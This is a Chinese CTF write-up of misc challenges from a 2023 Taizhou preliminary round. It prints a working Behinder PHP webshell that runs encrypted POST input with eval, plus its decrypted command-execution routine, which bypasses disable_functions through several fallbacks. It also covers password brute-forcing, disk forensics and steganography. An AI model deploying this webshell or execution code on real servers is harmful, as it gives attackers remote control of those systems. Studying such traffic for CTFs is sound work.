首页 > 其他分享 >2023年台州市初赛Misc

2023年台州市初赛Misc

时间:2023-09-27 17:48:43浏览次数:39  
标签:PadtJn exec kWJW Misc 初赛 else 2023 Bvce array

2023年台州市初赛Misc

这是神马

冰蝎流量,找到key

<?php
@error_reporting(0);
session_start();
    $key="144a6b2296333602"; 
        $_SESSION['k']=$key;
        session_write_close();
        $post=file_get_contents("php://input");
        if(!extension_loaded('openssl'))
        {
                $t="base64_"."decode";
                $post=$t($post."");
                
                for($i=0;$i<strlen($post);$i++) {
                             $post[$i] = $post[$i]^$key[$i+1&15]; 
                            }
        }
        else
        {
                $post=openssl_decrypt($post, "AES128", $key);
        }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
        class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

key=144a6b2296333602,对密文进行aes解密

在线aes解密网站:http://tools.bugscaner.com/cryptoaes/

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

在这个密文中得到

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$cmd="Y2QgL3Zhci93d3cvaHRtbC91cGxvYWQvLi4vO3RhciAtY3p2ZiAtIGZsYWcgfCBvcGVuc3NsIGRlczMgLXNhbHQgLWsgdGgxc2lzS2V5IC1vdXQgLi9mbGFnLnRhci5neg==";$cmd=base64_decode($cmd);$path="L3Zhci93d3cvaHRtbC91cGxvYWQvLi4v";$path=base64_decode($path);
main($cmd,$path);

对cmd解base64得到解压命令

cd /var/www/html/upload/../;tar -czvf - flag | openssl des3 -salt -k th1sisKey -out ./flag.tar.gz

对flag.tar.gz解压

openssl des3 -d -salt -in ./flag.tar.gz -k th1sisKey -out ./decrypted_flag.tar

得到emoji,aes-emoji解密,key就是th1sisKey

img

Black Mamba

是png文件,文件尾多余数据提取

观察结构,符合zip头

for i in range(1,200):
    if i ^ 0x48 == 0x50:
        print(i)

那直接爆破一下,得知结果是异或24

得到zip,备注说是常见密码

爆了很久没出,最后翻文件找到了之前做渗透时收集的密码本

爆破了好几本才得到密码

img

img

一开始还没看出来,字符集改为utf-8

img

那么直接随波逐流梭一下键盘密码

img

李先生的计算机

ad1是磁盘文件,FTK挂载

挂载成功后发现名为[email protected]_3684的文件夹

里面是sqlite数据,导入查看

img

img

得到了金额是600,以及文件内7z文件的密码(文件名为1的文件是7z文件)微信号是dbt_1126_tta

既然是jpg的隐写,那么把常见的都试一遍

最后发现是jphs

img

得到银行卡号:6222025567723373838

flag格式:DASCTF

那拼接一下 DASCTF{600_6222025567723373838}

标签:PadtJn,exec,kWJW,Misc,初赛,else,2023,Bvce,array
From: https://www.cnblogs.com/Mar10/p/17733250.html

相关文章

  • 【2023-09-27】新旧交替
    20:00不自反者,看不出一身病痛;不耐烦者,做不成一件事业。                                                 ——清·金缨《格言联璧》今天是最后一天在旧办公室上班。......
  • 攻防世界MISC【3-1】练习题WriteUp
    下载附件是一个没有后缀的文件,直接扔到010Editor看看观察了一下发现应该是rar压缩包,去给它加上后缀试试。加上后缀解压出来的又是一个不知道是什么的文件。直接丢到010Editor看了看发现是个流量包既然知道了是个流量包,试着给它加上pcap后缀试试看BinGo用Wireshark可以打......
  • 龙蜥社区与您相约 2023 KubeCon
    作为云原生领域最负盛名的技术大会之一,KubeCon+CloudNativeCon+OpenSourceSummitChina2023吸引全球顶尖的云原生专家们汇聚其中。2023年9月26-28日,将于上海跨国采购会展中心展示最前沿的技术创新,上百位嘉宾带来上百场主题演讲,为所有与会者提供了交流、学习和探索"......
  • 龙蜥社区与您相约 2023 KubeCon
    作为云原生领域最负盛名的技术大会之一,KubeCon+CloudNativeCon+OpenSourceSummitChina2023吸引全球顶尖的云原生专家们汇聚其中。2023年9月26-28日,将于上海跨国采购会展中心展示最前沿的技术创新,上百位嘉宾带来上百场主题演讲,为所有与会者提供了交流、学习和探索"......
  • 增材云荣获2023世界制造业大会“安徽省重点工业互联网平台”称号
    9月21日上午,2023世界制造业大会工业互联网专场发布会在合肥滨湖会展中心发布厅成功举办。会上发布了安徽省工业互联网领域的系列研究成果和创新应用案例。增材云平台深耕3D打印领域,整合3D打印产业链六大资源,以专业全面的技术助推行业快速发展效果卓著,从多家申报企业中脱颖而出,成功......
  • 【免费】2023云栖大会门票开抢啦!数量有限,先到先得!
    ......
  • NOI2023 D1T2 桂花树
    称编号\(>n\)的点为新点。由条件1可以推出树\(T\)为结点\(1\simn\)在树\(T'\)上的虚树。由条件2可以推出\(\forall1\leu<v\len+m,\operatorname{lca}(u,v)\lev+k\)。首先考虑\(k=0\)的做法:此时\(\forall1\leu<v\len+m,\operat......
  • 2023-09-20:用go语言,保证一定是n*n的正方形,实现从里到外转圈打印的功能 如果n是奇数,中
    2023-09-20:用go语言,保证一定是n*n的正方形,实现从里到外转圈打印的功能如果n是奇数,中心点唯一,比如abcdefghie是中心点,依次打印:efihgdabc如果n是偶数,中心点为最里层2*2的右下点比如abcdefghijklmnopqrstuvwxyz0123456789最里层是opu......
  • 2023-09-16:用go语言,给你一个整数 n 和一个在范围 [0, n - 1] 以内的整数 p , 它们表示
    2023-09-16:用go语言,给你一个整数n和一个在范围[0,n-1]以内的整数p,它们表示一个长度为n且下标从0开始的数组arr,数组中除了下标为p处是1以外,其他所有数都是0。同时给你一个整数数组banned,它包含数组中的一些位置。banned中第i个位置表示arr[banned[i]]=......
  • springcloud微服务03-heima2023
    在微服务远程调用的过程中,还存在几个问题需要解决。首先是业务健壮性问题:例如在之前的查询购物车列表业务中,购物车服务需要查询最新的商品信息,与购物车数据做对比,提醒用户。大家设想一下,如果商品服务查询时发生故障,查询购物车列表在调用商品服务时,是不是也会异常?从而导致购物车......